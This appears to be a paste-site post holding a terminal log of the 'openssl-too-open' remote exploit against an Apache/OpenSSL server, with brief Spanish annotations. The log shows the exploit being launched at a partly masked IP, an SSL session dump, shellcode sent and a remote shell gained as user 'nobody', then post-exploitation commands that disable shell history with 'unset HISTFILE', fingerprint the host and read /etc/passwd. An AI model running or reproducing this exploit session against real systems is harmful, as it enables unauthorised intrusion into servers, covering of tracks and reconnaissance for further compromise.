Untitled


SUBMITTED BY: Guest

DATE: Dec. 12, 2013, 12:41 a.m.

FORMAT: Text only

SIZE: 1.2 kB

HITS: 12832

  1. bash-2.04# ./solar 0x1a 200.xxx.100.24 -c 30
  2. : openssl-too-open.c - OpenSSL remote apache exploit
  3. by Solar Eclipse <solareclipse@phreedom.org>
  4. : Private 0dd code.
  5. Opening connections... 30 of 30
  6. Establishing SSL connection
  7. Session:
  8. 0000 - c0 da ab cb 39 39 43 1f 7f 51 08 2a 37 4f fe de
  9. 0010 - 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  10. 0020 - 20 00 00 00 63 64 32 36 63 36 32 30 65 35 32 35
  11. 0030 - 62 34 37 63 62 36 30 31 37 38 39 32 62 64 66 63
  12. 0040 - 37 39 63 32 00 00 00 00 b8 62 12 08 00 00 00 00
  13. 0050 - 00 00 00 00 01 00 00 00 2a 01 00 00 56 17 e5 3d
  14. 0060 - 00 00 00 00 ac 14 32 40 00 00 00 00 58 62 12 08
  15. 0070 -
  16. cipher: 0x403214ac ciphers: 0x8126258
  17. Ready to send shellcode
  18. Spawning shell...
  19. bash: no job control in this shell
  20. bash-2.04$
  21. bash-2.04$ unset HISTFILE; uname -a; id; echo ‘Welcome master!’
  22. Linux localhost.domain 2.2.17-14cl #1 qui nov 2 00:24:54 EST 2000 i686 unknown
  23. uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
  24. Welcome master! (todo esto se ejecuta de modo automatico)
  25. bash-2.04$
  26. bash-2.04$ cat /etc/passwd - El intruso mira (aun sin privilegios)

comments powered by Disqus